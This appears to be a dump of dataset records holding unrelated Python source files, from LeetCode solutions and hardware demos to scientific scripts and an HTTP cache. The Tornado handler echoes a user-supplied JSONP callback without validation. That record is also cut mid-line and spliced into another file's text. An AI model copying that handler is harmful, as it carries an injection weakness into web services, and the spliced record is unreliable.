sold, 1 held, 2 reset\n dp[0][0], dp[0][1], dp[0][2] = float('-inf'), float('-inf'), 0\n\n for i in range(1, n + 1):\n dp[i][0] = dp[i - 1][1] + prices[i - 1]\n dp[i][1] = max(dp[i - 1][1], dp[i - 1][2] - prices[i - 1])\n dp[i][2] = max(dp[i - 1][2], dp[i - 1][0])\n\n return max(dp[n][0], dp[n][2])\n\n \"\"\"\n Approach 1: Dynamic Programming with State Machine\n Intuition\n\n First of all, let us take a different perspective to look at the problem, unlike the other algorithmic problems.\n\n Here, we will treat the problem as a game, and the trader as an agent in the game. The agent can take actions that lead to gain or lose of game points (i.e. profits). And the goal of the game for the agent is to gain the maximal points.\n\n In addition, we will introduce a tool called state machine, which is a mathematical model of computation. Later one will see how the state machine coupled with the dynamic programming technique can help us solve the problem easily.\n\n In the following sections, we will first define a state machine that is used to model the behaviors and states of the game agent.\n\n Then, we will demonstrate how to apply the state machine to solve the problem.\n\n Definition\n\n Let us define a state machine to model our agent. The state machine consists of three states, which we define as follows:\n\n state held: in this state, the agent holds a stock that it bought at some point before.\n\n state sold: in this state, the agent has just sold a stock right before entering this state. And the agent holds no stock at hand.\n\n state reset: first of all, one can consider this state as the starting point, where the agent holds no stock and did not sell a stock before. 
More importantly, it is also the transient state before the held and sold. Due to the cooldown rule, after the sold state, the agent can not immediately acquire any stock, but is forced into the reset state. One can consider this state as a \"reset\" button for the cycles of buy and sell transactions.\n\n At any moment, the agent can only be in one state. The agent would transition to another state by performing some actions, namely:\n\n action sell: the agent sells a stock at the current moment. After this action, the agent would transition to the sold state.\n\n action buy: the agent acquires a stock at the current moment. After this action, the agent would transition to the held state.\n\n action rest: this is the action that the agent does no transaction, neither buy or sell. For instance, while holding a stock at the held state, the agent might simply do nothing, and at the next moment the agent would remain in the held state.\n\n Now, we can assemble the above states and actions into a state machine, which we show in the following graph where each node represents a state, and each edge represents a transition between two states. On top of each edge, we indicate the action that triggers the transition.\n \"\"\"\n\n def doit_dp_1(self, prices):\n \"\"\"\n :type prices: List[int]\n :rtype: int\n \"\"\"\n sold, held, reset = float('-inf'), float('-inf'), 0\n\n for price in prices:\n # Alternative: the calculation is done in parallel.\n # Therefore no need to keep temporary variables\n #sold, held, reset = held + price, max(held, reset-price), max(reset, sold)\n\n pre_sold = sold\n sold = held + price\n held = max(held, reset - price)\n reset = max(reset, pre_sold)\n\n return max(sold, reset)\n\n\nif __name__ == '__main__':\n\n BestTimeSellStockWithCooldown().doit_dp_1([1,2,4])\n\n BestTimeSellStockWithCooldown().doit_dp([1, 2, 4])\n\n\n","sub_path":"PythonLeetcode/leetcodeM/309_BestTimeToBuyAndSellStockWithCooldown.py","file_name":"309_BestTimeToBuyAndSellStockWithCooldown.py","file_ext":"py","file_size_in_byte":4590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"453648769","text":"# LED demo for ESP8266\nfrom machine import Pin\nimport time\n\nled_no = [32, 33, 25, 26]\n\n\ndef switch_off():\n for led in leds:\n led.off()\n\n\nleds = list()\nfor i in range(len(led_no)):\n led = Pin(led_no[i], Pin.OUT)\n leds.append(led)\n\nwhile True:\n for led in leds:\n switch_off()\n led.on()\n time.sleep(1)\n","sub_path":"ESP32/led_ESP32.py","file_name":"led_ESP32.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"45817781","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\n __init__.py\n @author yf\n @version\n Copyright (c) 2013 yufeng All rights reserved.\n\"\"\"\nimport tornado.web\nimport tornado.web, hmac, hashlib, datetime, json #, functools, urllib, os\nfrom tornado.escape import json_decode\nfrom tornado import escape\nimport decimal\nimport logging as l\n\ndef _default(obj):\n if isinstance(obj, datetime.datetime):\n return obj.strftime('%Y-%m-%dT%H:%M:%S')\n elif isinstance(obj, datetime.date):\n return obj.strftime('%Y-%m-%d')\n elif isinstance(obj, decimal.Decimal):\n return str(obj)\n else:\n return obj\n\nclass base(tornado.web.RequestHandler):\n @property\n def db(self):\n return self.application.db\n\n def get_current_user(self):\n uid = self.get_secure_cookie(\"u\")\n u = self.db.user(id=uid).one()\n if u:\n return 
self.get_secure_cookie(\"u\")\n return None\n\n def write(self, chunk):\n if isinstance(chunk, dict):\n cb = self.get_argument(\"callback\", None)\n if cb is not None:\n super(base, self).write(cb + '(' + json.dumps(chunk) + ')')\n self.set_header('Content-Type', 'application/javascript')\n else:\n chunk = json.dumps(chunk, default=_default).replace('.\n#\nimport os\nimport sys\nimport unittest\n\nimport lsst.afw.geom\nimport lsst.utils.tests\nfrom lsst.utils import getPackageDir\nfrom lsst.geom import arcseconds, Extent2I\nimport lsst.obs.base.tests\nimport lsst.obs.test\n\n\nclass TestObsTest(lsst.obs.base.tests.ObsTests, lsst.utils.tests.TestCase):\n \"\"\"Run standard obs_base unit tests.\n \"\"\"\n def setUp(self):\n product_dir = getPackageDir('obs_test')\n data_dir = os.path.join(product_dir, 'data', 'input')\n\n butler = lsst.daf.persistence.Butler(root=data_dir)\n mapper = lsst.obs.test.TestMapper(root=data_dir)\n dataIds = {'raw': {'visit': 1, 'filter': 'g'},\n 'bias': {'visit': 1},\n 'flat': {'visit': 1},\n 'dark': unittest.SkipTest\n }\n self.setUp_tests(butler, mapper, dataIds)\n\n ccdExposureId_bits = 41\n exposureIds = {'raw': 1, 'bias': 1, 'flat': 1}\n filters = {'raw': 'g', 'bias': '_unknown_', 'flat': 'g'}\n exptimes = {'raw': 15.0, 'bias': 0.0, 'flat': 0.0}\n detectorIds = {'raw': 0, 'bias': 0, 'flat': 0}\n detector_names = {'raw': '0', 'bias': '0', 'flat': '0'}\n detector_serials = {'raw': '0000011', 'bias': '0000011', 'flat': '0000011'}\n dimensions = {'raw': Extent2I(1026, 2000),\n 'bias': Extent2I(1018, 2000),\n 'flat': Extent2I(1018, 2000)\n }\n sky_origin = (79.24521968, -9.702295415)\n raw_subsets = (({'level': 'sensor', 'filter': 'g'}, 2),\n ({'level': 'sensor', 'visit': 1}, 1),\n ({'level': 'filter', 'visit': 1}, 1),\n ({'level': 'visit', 'filter': 'g'}, 2)\n )\n linearizer_type = unittest.SkipTest\n\n path_to_raw = os.path.join(data_dir, \"raw\", \"raw_v1_fg.fits.gz\")\n raw_header_wcs = lsst.afw.geom.makeSkyWcs(lsst.afw.fits.readMetadata(path_to_raw))\n\n self.setUp_butler_get(ccdExposureId_bits=ccdExposureId_bits,\n exposureIds=exposureIds,\n filters=filters,\n exptimes=exptimes,\n detectorIds=detectorIds,\n detector_names=detector_names,\n detector_serials=detector_serials,\n dimensions=dimensions,\n sky_origin=sky_origin,\n raw_subsets=raw_subsets,\n linearizer_type=linearizer_type,\n raw_header_wcs=raw_header_wcs\n )\n\n keys = set(('filter', 'name', 'patch', 'tract', 'visit', 'pixel_id', 'subfilter',\n 'fgcmcycle', 'numSubfilters', 'label', 'detector', 'expId', 'subdir'))\n query_format = [\"visit\", \"filter\"]\n queryMetadata = (({'visit': 1}, [(1, 'g')]),\n ({'visit': 2}, [(2, 'g')]),\n ({'visit': 3}, [(3, 'r')]),\n ({'filter': 'g'}, [(1, 'g'), (2, 'g')]),\n ({'filter': 'r'}, [(3, 'r')]),\n )\n map_python_type = 'lsst.afw.image.DecoratedImageU'\n map_cpp_type = 'DecoratedImageU'\n map_storage_name = 'FitsStorage'\n metadata_output_path = os.path.join('processCcd_metadata', 'v1_fg.yaml')\n raw_filename = 'raw_v1_fg.fits.gz'\n default_level = 'visit'\n raw_levels = (('skyTile', set(['filter'])),\n ('filter', set(['filter', 'visit'])),\n ('visit', set(['filter', 'visit']))\n )\n self.setUp_mapper(output=data_dir,\n path_to_raw=path_to_raw,\n keys=keys,\n query_format=query_format,\n queryMetadata=queryMetadata,\n metadata_output_path=metadata_output_path,\n map_python_type=map_python_type,\n map_cpp_type=map_cpp_type,\n map_storage_name=map_storage_name,\n raw_filename=raw_filename,\n default_level=default_level,\n raw_levels=raw_levels,\n )\n\n 
self.setUp_camera(camera_name='test',\n                          n_detectors=1,\n                          first_detector_name='0',\n                          plate_scale=20 * arcseconds,\n                          )\n\n        super(TestObsTest, self).setUp()\n\n\nclass MemoryTester(lsst.utils.tests.MemoryTestCase):\n    pass\n\n\ndef setup_module(module):\n    lsst.utils.tests.init()\n\n\nif __name__ == '__main__':\n    setup_module(sys.modules[__name__])\n    unittest.main()\n","sub_path":"tests/test_obs_test.py","file_name":"test_obs_test.py","file_ext":"py","file_size_in_byte":5761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"44111089","text":"#!/usr/bin/env python\n# _*_coding:utf-8 _*_\n# @Author:Zhang Shiwei\n# @Date :2020/4/15\n\n\"\"\"\nDictionary-based backward maximum matching word segmentation algorithm\n\"\"\"\n\n\ndef add_dict(dictfile):\n    \"\"\"\n    Load the dictionary\n    :param dictfile: dictionary file\n    :return:\n    \"\"\"\n    f_dict = open(dictfile, \"r\", encoding=\"utf-8\")\n    max_length = 1\n    dictionary = list()\n    for line in f_dict.readlines():\n        dictionary.append(line.strip())\n        if len(line.strip()) > max_length:\n            max_length = len(line.strip())\n    f_dict.close()\n    return dictionary, max_length\n\n\ndef segment(rawfile, dictfile):\n    \"\"\"\n    Backward maximum matching segmentation\n    :param rawfile: text to be segmented\n    :param dictfile: dictionary file\n    :return:\n    \"\"\"\n    dictionary, max_length = add_dict(dictfile)\n    f_raw = open(rawfile, \"r\", encoding=\"utf-8\")\n    f_result = open(\"seg_results/backward.txt\", \"w\", encoding=\"utf-8\")\n    for line in f_raw.readlines():\n        words = list()  # stores the segmented words of one sentence\n        line = line.strip()\n        while len(line) > 0:\n            max_len = len(line) if len(line) < max_length else max_length  # current candidate word length\n            try_word = line[-max_len:]\n            while try_word not in dictionary:  # keep looking up the current candidate in the dictionary\n                if len(try_word) == 1:\n                    break\n                else:\n                    try_word = try_word[1:]\n            words.append(try_word)\n            line = line[:-len(try_word)]\n        # write out the result\n        while words:\n            word = words.pop()\n            f_result.write(word + \"|\")\n        f_result.write(\"\\n\")\n\n    f_raw.close()\n    f_result.close()\n\n\ndef main():\n    segment(\"origin.txt\", \"dict.txt\")\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"word_segment/backward_max_match_segment.py","file_name":"backward_max_match_segment.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"275141926","text":"# '''\n# Prime factorization\n# 1. read a number (n)\n# 2. list the primes from 2 to n (using the Sieve of Eratosthenes)\n# 3. divide n by the primes from smallest up, repeatedly\n# 4. 
stop when it reaches 1\n# '''\n\n# n = int(input()) # the number to factorize\n\n# if n != 1:\n#     decimal_bool = [True for i in range(n+1)]\n\n#     for i in range(2, int(n**0.5) + 1): # i not yet processed among the remaining numbers\n#         if decimal_bool[i] == True:\n#             j = 2\n#             while i*j <= n:\n#                 decimal_bool[i*j] = False # remove all multiples of i\n#                 j += 1\n\n#     decimal = [i for i in range(2, n+1) if decimal_bool[i]] # list of primes\n\n#     left = n\n#     while True: # prime factorization\n#         if left == 1: # if nothing is left to divide (i.e. it is 1), stop\n#             break\n#         for i in decimal:\n#             if left%i == 0: # if divisible by this prime, print it and divide\n#                 print(i)\n#                 left = left/i\n#                 break\n\n# the approach above also works, but it exceeds the time limit\n# no need to sieve out only the primes; just trying divisors in order is fine\n\nn = int(input()) # the number to factorize\n\nj = 2 # the divisor (a prime whenever it divides n)\nwhile True:\n    if n == 1:\n        break\n    elif n%j == 0:\n        print(j)\n        n = n/j\n    else:\n        j += 1","sub_path":"1_백준/1_단계별학습/09_기본_수학_2/3_11653.py","file_name":"3_11653.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"141616239","text":"import tensorflow as tf \nfrom tools.data_pool import DataPool\nfrom attrdict import AttrDict  # assumed import: the original record uses AttrDict without defining or importing it\nimport os\n\nDATA_REAL_PATH = \"./data/arxiv.txt\"\nFROZEN_GRAPH_FILE = \"./frozen/graph.pb\"\n\ndef _main(params, data_path):\n    with tf.gfile.GFile(FROZEN_GRAPH_FILE, \"rb\") as f:\n        graph_def = tf.GraphDef()\n        graph_def.ParseFromString(f.read())\n\n    graph = tf.Graph()\n    with graph.as_default():\n        tf.import_graph_def(\n            graph_def,\n            input_map = None,\n            return_elements = None,\n            name = \"trained\",\n            op_dict = None,\n            producer_op_list = None\n        )\n    inputs = graph.get_tensor_by_name('trained/input:0')\n    predict = graph.get_tensor_by_name('trained/infer:0')\n\n    infer_data_pool = DataPool(data_path, params.batch_size, params.seq_length)\n\n    with tf.Session(graph=graph) as sess:\n        for steps, text_inputs in enumerate(next(infer_data_pool)):\n            feed_dict={\n                'trained/input:0': text_inputs,\n            }\n\n            ret = sess.run(\"trained/infer:0\", feed_dict=feed_dict)\n            print(ret)\n            break\n\n\n\nif __name__ == \"__main__\":\n\n    data_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), DATA_REAL_PATH)\n    \n    params = AttrDict(\n        batch_size=2,\n        seq_length=1140,\n        vocab_size=86,\n        rnn_hidden=86,\n        output_size=86,\n        learning_rate=0.1,\n        momentum=0.5,\n        gradient_clipping=0.5\n    )\n\n    _main(params, data_path)","sub_path":"cha6_rnn/4_seq_generation/infer.py","file_name":"infer.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"371647185","text":"import turtle\n\nleonardo = turtle.Turtle()\n\ndef draw_square(some_turtle):\n    global running\n    for i in range(1,5):\n        if not running: break\n        some_turtle.forward(100)\n        some_turtle.right(90)\ndef draw_art():\n    global running\n    window = turtle.Screen()\n    leonardo.shape(\"turtle\")\n    leonardo.color(\"blue\")\n    leonardo.speed(10)\n    for i in range(1,36):\n        if not running: break\n        draw_square(leonardo)\n        leonardo.right(10)\n    \n    window.exitonclick()\n    \ndef stop(x,y): \n    global running\n    running = False\n\nleonardo.screen.onclick(stop)\n\nrunning = True\n\ndraw_art()\n","sub_path":"draw_with_turtle.py","file_name":"draw_with_turtle.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"421964326","text":"import os\nimport errno\n\nfrom kapacitor.udf.agent import Agent\nfrom htm_aggr_handler import HTMAggrHandler\n\nfrom data.file_logger import FileLogger\n\n\nclass Accepter(object):\n    \"\"\"\n    Accepter implementation for accepting new 
connections.\n Initializes new Agent with HTMAggrHandler.\n \"\"\"\n _count = 0\n\n def __init__(self, logger, store_results=False):\n self._logger = logger\n self.store_results = store_results\n\n def accept(self, conn, addr):\n self._count += 1\n\n a = Agent(conn, conn)\n h = HTMAggrHandler(a, flogger=self.__get_flogger())\n a.handler = h\n\n self._logger.info(\"Starting Agent for connection %d\", self._count)\n \n try:\n a.start()\n a.wait()\n except IOError as e:\n self._logger.error(e.strerror) \n\n self._logger.info(\"Agent finished connection %d\", self._count)\n a.handler = None\n\n def __get_flogger(self):\n \"\"\"\n If file logging is enabled,\n create a new file logger and return it.\n \"\"\"\n\n if not self.store_results:\n return None\n\n logpath = os.getenv('LOG_DIR_PATH', '/tmp/log')\n\n # Create log directory\n if not os.path.exists(logpath):\n try:\n os.makedirs(logpath)\n except OSError as err:\n if err.errno != errno.EEXIST:\n raise\n\n flogger = FileLogger(os.path.join(\n logpath,\n 'scores_{}.csv'.format(self._count)\n ))\n flogger.write_init()\n return flogger\n","sub_path":"satel_nupic/server/accepter.py","file_name":"accepter.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"183392930","text":"#!usr/bin/env python\n# import modules here\n# use mpi4py to process output parallelly\nimport h5py\nimport numpy as np\nimport sys\nimport os\nimport pandas as pd\nsys.path.append('/n/home10/xiangtao/projects_code/EDPyUtils/')\nimport ed2_utils\nimport argparse\n\n# default values for input\n\n#####################################################\n# parse the argument\nparser = argparse.ArgumentParser(description='Parse ED run prefixes to process')\nparser.add_argument('-p','--prefix', help='prefixes to process'\n ,nargs='+' # allow for multiple arguments under this flag\n ,type = str) \nparser.add_argument('-pft','--pft', help='pft list'\n ,nargs='+' # allow for multiple arguments under this flag\n ,type = int) \nparser.add_argument('-lon','--lon', help='longitude'\n ,type = float) \nparser.add_argument('-time','--lt', help='local time [HH:MM:SS]'\n ,nargs='+' # allow for multiple arguments under this flag\n ,type = str) \nargs = parser.parse_args()\n\nif len(args.prefix) > 0:\n pf_array = np.array(args.prefix)\n print(pf_array)\n\nif len(args.pft) > 0:\n pft_list = args.pft\n\nsite_lon = args.lon\nlocal_time_list = np.array(args.lt)\n####################################################\n\n# convert local time to UTC time\nunit_fast = 3600. \n# time interval of fast output, this will determine how we\n# round the observational time\n\n\nutc_time_list = []\ntime_lag = site_lon / 360. * 24. # hours\nfor itime, time_str in enumerate(local_time_list):\n # first convert time_str to hour of day\n hod = float(time_str[0:2]) + float(time_str[3:5]) / 60. + float(time_str[6:8]) / 3600.\n\n utc_hod = np.mod(hod - time_lag,24)\n\n # round to the nearest half hour\n # TODO: to be removed later\n utc_hod = np.around(utc_hod * 2.) / 2.\n\n # round upward to the nearest unit_fast time point\n utc_hod = np.ceil(utc_hod * 3600. / unit_fast ) / (3600. 
/ unit_fast)\n\n # convert to str\n utc_hod_str = '{:02d}{:02d}{:02d}'.format(\n int(np.floor(utc_hod)),int((utc_hod-np.floor(utc_hod)) * 60.),\n 0)\n utc_time_list.append(utc_hod_str)\n\n\n\noutput_path = '/n/moorcroftfs5/xiangtao/ED_output/amazon_vod'\noutput_yeara = 2001\noutput_yearz = 2010\n\n#pft_list = [2,3,4]\n\n# create pf list\n\nfor pf_name in pf_array:\n\n\n # use height monthly\n size_list = ('H',np.arange(0,50+1,5))\n voi_avg=['MMEAN_GPP_PY','MMEAN_NEP_PY','MMEAN_SENSIBLE_LC_PY',\n 'MMEAN_VAPOR_LC_PY','MMEAN_VAPOR_WC_PY','MMEAN_VAPOR_GC_PY','MMEAN_VAPOR_AC_PY',\n 'MMEAN_TRANSP_PY']\n voi_avg_pft = ['MMEAN_LAI','AGB','BA','NPLANT']\n voi_pft_size = ['MMEAN_LAI','NPLANT','AGB','BA']\n\n csv_fn = '{:s}_monthly.csv'.format(pf_name)\n site_name=pf_name.split('_')[0]\n ed2_utils.extract_ed2_monthly(\n '{:s}/{:s}/{:s}'.format(output_path,site_name,pf_name),\n csv_fn,\n output_yeara,1,\n output_yearz,12,\n voi_avg=voi_avg,voi_avg_pft=voi_avg_pft,\n voi_pft_size=voi_pft_size,\n pft_list = pft_list,size_list=size_list)\n\n\n # extract obs time output\n# voi_size = ['LAI','FMEAN_LEAF_WATER_INT','FMEAN_LEAF_WATER'\n# ,'FMEAN_LEAF_PSI']\n# voi_pft_size = ['LAI','FMEAN_LEAF_WATER_INT','FMEAN_LEAF_WATER',\n# 'FMEAN_LEAF_PSI']\n#\n#\n# # use LAI\n# size_list = ('LAI',np.arange(0,5.1,0.5))\n# csv_fn = '{:s}_obs_LAIsize.csv'.format(pf_name)\n# site_name=pf_name.split('_')[0]\n# ed2_utils.extract_ed2_fast(\n# '{:s}/{:s}/{:s}'.format(output_path,site_name,pf_name),\n# csv_fn,\n# output_yeara,1,1,\n# output_yearz,12,31,\n# utc_time_list,\n# voi_avg=[],voi_avg_pft=[],\n# voi_size = voi_size,\n# voi_pft_size=voi_pft_size,\n# pft_list = pft_list,size_list=size_list)\n#\n# # use height\n# size_list = ('H',np.arange(0,50+1,5))\n# csv_fn = '{:s}_obs_Hsize.csv'.format(pf_name)\n# site_name=pf_name.split('_')[0]\n# ed2_utils.extract_ed2_fast(\n# '{:s}/{:s}/{:s}'.format(output_path,site_name,pf_name),\n# csv_fn,\n# output_yeara,1,1,\n# output_yearz,12,31,\n# utc_time_list,\n# voi_avg=[],voi_avg_pft=[],\n# voi_size = voi_size,\n# voi_pft_size=voi_pft_size,\n# pft_list = pft_list,size_list=size_list)\n\n\n\n\n\n\n\n","sub_path":"ED2-Amazon/post_proc/extract_vod_output.py","file_name":"extract_vod_output.py","file_ext":"py","file_size_in_byte":4345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"488960154","text":"import random\nimport numpy as np\n\ndef chunk(l, n):\n return np.array_split(np.array(l),n)\nclass SMA:\n\n def __init__(self,pop_size, max_group_size,local_leader_limit, global_leader_limit,\n pr, fitness_func, dir_min_max, conditional_func, minimize=False):\n self.groups = []\n self.global_leader_count = 0\n self.population = []\n self.pop_size = pop_size\n self.global_leader = None\n self.local_leader_limit = local_leader_limit\n self.global_leader_limit = global_leader_limit\n self.pr = pr\n self.fitness_func = fitness_func\n self.dir_min_max = dir_min_max\n self.max_group_size = max_group_size\n self.conditional_func = conditional_func\n self.iter_count = 0\n self.minimize = minimize\n self.min_max_f = min if self.minimize else max\n\n @staticmethod\n def clip(value,min_max):\n if value < min_max[0]:\n return min_max[0]\n\n if value > min_max[1]:\n return min_max[1]\n\n return value\n\n def fitness_cmp(self,new,old):\n if not self.minimize:\n return new > old\n else:\n return new < old\n\n def global_learning(self):\n best = self.min_max_f(self.population,key = lambda sm: sm.fitness)\n\n if self.global_leader == None:\n 
self.global_leader = best\n return\n\n if self.fitness_cmp(best.fitness,self.global_leader.fitness):\n self.global_leader.pos = best.pos[:]\n self.global_leader.fitness = best.fitness\n else:\n self.global_leader_count += 1\n\n\n def init_pop(self):\n gp = SMG(self)\n self.groups.append(gp)\n for _ in range(self.pop_size):\n sm = SM(gp)\n gp.add(sm)\n sm.calc_fitness()\n self.population.append(sm)\n\n\n def local_learning(self):\n for gp in self.groups:\n gp.local_learning()\n\n\n def local_leader_phase(self):\n for gp in self.groups:\n gp.members_pos_update()\n\n def global_leader_phase(self):\n for gp in self.groups:\n gp.calc_probs()\n\n for sm in self.population:\n if random.random() < sm.prob:\n new_pos = sm.pos[:]\n while True:\n other = random.choice(self.population)\n if other != sm:\n break\n i = random.choice(range(len(self.dir_min_max)))\n new_pos[i] = sm.pos[i] + random.uniform(0,1) * (self.global_leader.pos[i] - sm.pos[i]) \\\n + random.uniform(-1,1) * (other.pos[i] - sm.pos[i])\n\n new_pos[i] = self.clip(new_pos[i],self.dir_min_max[i])\n\n new_pos_fitness = self.fitness_func(new_pos)\n if self.fitness_cmp(new_pos_fitness,sm.fitness):\n sm.pos = new_pos[:]\n sm.fitness = new_pos_fitness\n\n def global_leader_decision(self):\n\n if self.global_leader_count > self.global_leader_limit:\n self.global_leader_count = 0\n size = len(self.groups)\n self.groups = []\n if size < self.max_group_size:\n\n qt = size + 1\n for p in chunk(self.population,qt):\n gp = SMG(self)\n self.groups.append(gp)\n for sm in p:\n gp.add(sm)\n gp.local_learning()\n\n else:\n gp = SMG(self)\n self.groups.append(gp)\n for p in self.population:\n gp.add(p)\n gp.local_learning()\n\n def local_leader_decision(self):\n for gp in self.groups:\n gp.local_leader_decision()\n\n def run(self):\n self.init_pop()\n\n self.local_learning()\n self.global_learning()\n\n while True:\n\n self.local_leader_phase()\n self.global_leader_phase()\n self.local_learning()\n self.global_learning()\n self.local_leader_decision()\n self.global_leader_decision()\n\n self.iter_count += 1\n if not self.conditional_func(self.iter_count,self.global_leader.pos,self.global_leader.fitness,self):\n return\n\n\n\n\n\n\nclass SMG:\n def __init__(self,sma):\n self.sma = sma\n self.local_leader = None\n self.members = []\n self.local_leader_count = 0\n\n def add(self,sm):\n sm.group = self\n self.members.append(sm)\n\n def local_learning(self):\n best = self.sma.min_max_f(self.members,key = lambda sm: sm.fitness)\n if self.local_leader == None:\n self.local_leader = best\n return\n\n if self.sma.fitness_cmp(best.fitness,self.local_leader.fitness):\n self.local_leader.pos = best.pos[:]\n self.local_leader.fitness = best.fitness\n else:\n self.local_leader_count += 1\n\n def members_pos_update(self):\n if len(self.members) == 1:\n return\n for sm in self.members:\n new_pos = [0] * len(self.sma.dir_min_max)\n while True:\n other = random.choice(self.members)\n if other != sm:\n break\n\n for i,min_max in enumerate(self.sma.dir_min_max):\n if random.uniform(0,1) >= self.sma.pr:\n new_pos[i] = sm.pos[i] + random.uniform(0,1) * (self.local_leader.pos[i] - sm.pos[i]) \\\n + random.uniform(-1,1) * (other.pos[i] - sm.pos[i])\n new_pos[i] = self.sma.clip(new_pos[i],min_max)\n\n else:\n new_pos[i] = sm.pos[i]\n\n new_pos_fitness = self.sma.fitness_func(new_pos)\n if self.sma.fitness_cmp(new_pos_fitness,sm.fitness):\n sm.pos = new_pos[:]\n sm.fitness = new_pos_fitness\n\n def local_leader_decision(self):\n if self.local_leader_count > 
self.sma.local_leader_limit:\n self.local_leader_count = 0\n for sm in self.members:\n for i,min_max in enumerate(self.sma.dir_min_max):\n min,max = min_max\n if random.uniform(0,1) >= self.sma.pr:\n sm.pos[i] = SM.calc_rand_pos(min,max)\n else:\n sm.pos[i] = sm.pos[i] + random.uniform(0,1) * (self.sma.global_leader.pos[i] - sm.pos[i]) \\\n + random.uniform(0,1) * (sm.pos[i] - self.local_leader.pos[i])\n sm.pos[i] = self.sma.clip(sm.pos[i],min_max)\n sm.calc_fitness()\n\n\n\n\n def calc_probs(self):\n max_fitness = max(self.members, key=lambda sm: sm.fitness).fitness\n for sm in self.members:\n sm.prob = 0.9 * (sm.fitness / max_fitness) + 0.1\n\n def print_leader(self):\n print(self.local_leader)\n\n\nclass SM:\n def __init__(self,group=None):\n self.group = group\n self.fitness = None\n self.prob = 0\n self.rand_pos()\n\n def rand_pos(self):\n self.pos = []\n for min,max in self.group.sma.dir_min_max:\n pos = self.calc_rand_pos(min,max)\n self.pos.append(pos)\n\n @staticmethod\n def calc_rand_pos(min,max):\n return min + random.uniform(0, 1) * (max - min)\n\n def calc_fitness(self):\n self.fitness = self.group.sma.fitness_func(self.pos)\n\n def __str__(self):\n return \"{} -> {}\".format(self.pos, self.fitness)\n\n\n\n","sub_path":"spider_monkey.py","file_name":"spider_monkey.py","file_ext":"py","file_size_in_byte":7543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"232964888","text":"import cPickle as pickle\nimport hashlib\nfrom cStringIO import StringIO\nfrom contextlib import closing\nfrom datetime import datetime\nfrom httpy import HttpHeaders, HttpResponse\n\nfrom pysqlite2 import dbapi2 as sqlite3\nfrom urlo.normalize import unquoted\n\nfrom .cache_db import get_response, insert_response, update_response, get_history, insert_history\n\n\nclass SqlLiteCache(closing):\n def __init__(self, conn):\n \"\"\" :type conn: quelo.sqlite.DbFile\"\"\"\n super(SqlLiteCache, self).__init__(self)\n self._conn = conn\n self._cursor = self._conn.cursor()\n\n def get(self, request):\n response = get_response(self._cursor, unquoted(request.url), request.method)\n if response:\n response = _create_response(request, *response)\n return response\n\n def store(self, response, keep_history=True):\n self._insert_response(response.request, response, keep_history=keep_history)\n self._conn.commit()\n\n def _insert_response(self, request, response, keep_history=True):\n request_url = unquoted(request.url)\n response_url = unquoted(response.url)\n headers_dict = dict(response.headers)\n headers = pickle.dumps(headers_dict)\n body = sqlite3.Binary(response.body)\n\n previous = get_response(self._cursor, request_url, request.method)\n if not previous:\n self._insert(request_url, request.method, response_url, response.status, response.date, headers, body)\n else:\n self._update(request_url, request.method, response_url, response.status, response.date, headers, body)\n if keep_history:\n self._save_history(request_url, request.method, *previous)\n\n def _insert(self, request_url, method, response_url, status, date, headers, body):\n insert_response(self._cursor, request_url, method, response_url, status, date, headers, body)\n\n def _update(self, request_url, method, response_url, status, date, headers, body):\n update_response(self._cursor, request_url, method, response_url, status, date, headers, body)\n\n def _save_history(self, url, method, response_url, status, headers, body, date):\n body_str = str(body)\n\n sha1 = _checksum(StringIO(body_str))\n\n 
unchanged = get_history(self._cursor, url, method, sha1)\n if not unchanged:\n body = sqlite3.Binary(body_str)\n insert_history(self._cursor, url, method, sha1, response_url, status, date, headers, body)\n\n def close(self):\n self._cursor.close()\n self._conn.close()\n\n\ndef _create_response(request, url, status, headers, body, response_date):\n return CachedHttpResponse(request, url, int(status), pickle.loads(str(headers)), str(body), response_date)\n\n\ndef _checksum(buf, block_size=1024 * 128):\n sha1 = hashlib.sha1()\n\n for chunk in iter(lambda: buf.read(block_size), b''):\n sha1.update(chunk)\n return sha1.hexdigest()\n\n\nclass CachedHttpResponse(HttpResponse):\n def __init__(self, request, url, status, headers, body, date):\n super(CachedHttpResponse, self).__init__(request, url, status, HttpHeaders(headers), body)\n self.date = date\n self.flags = ['cached']\n\n def is_older_than(self, expiration):\n return expiration and datetime.utcnow() - self.date >= expiration\n","sub_path":"cachew/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":3322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
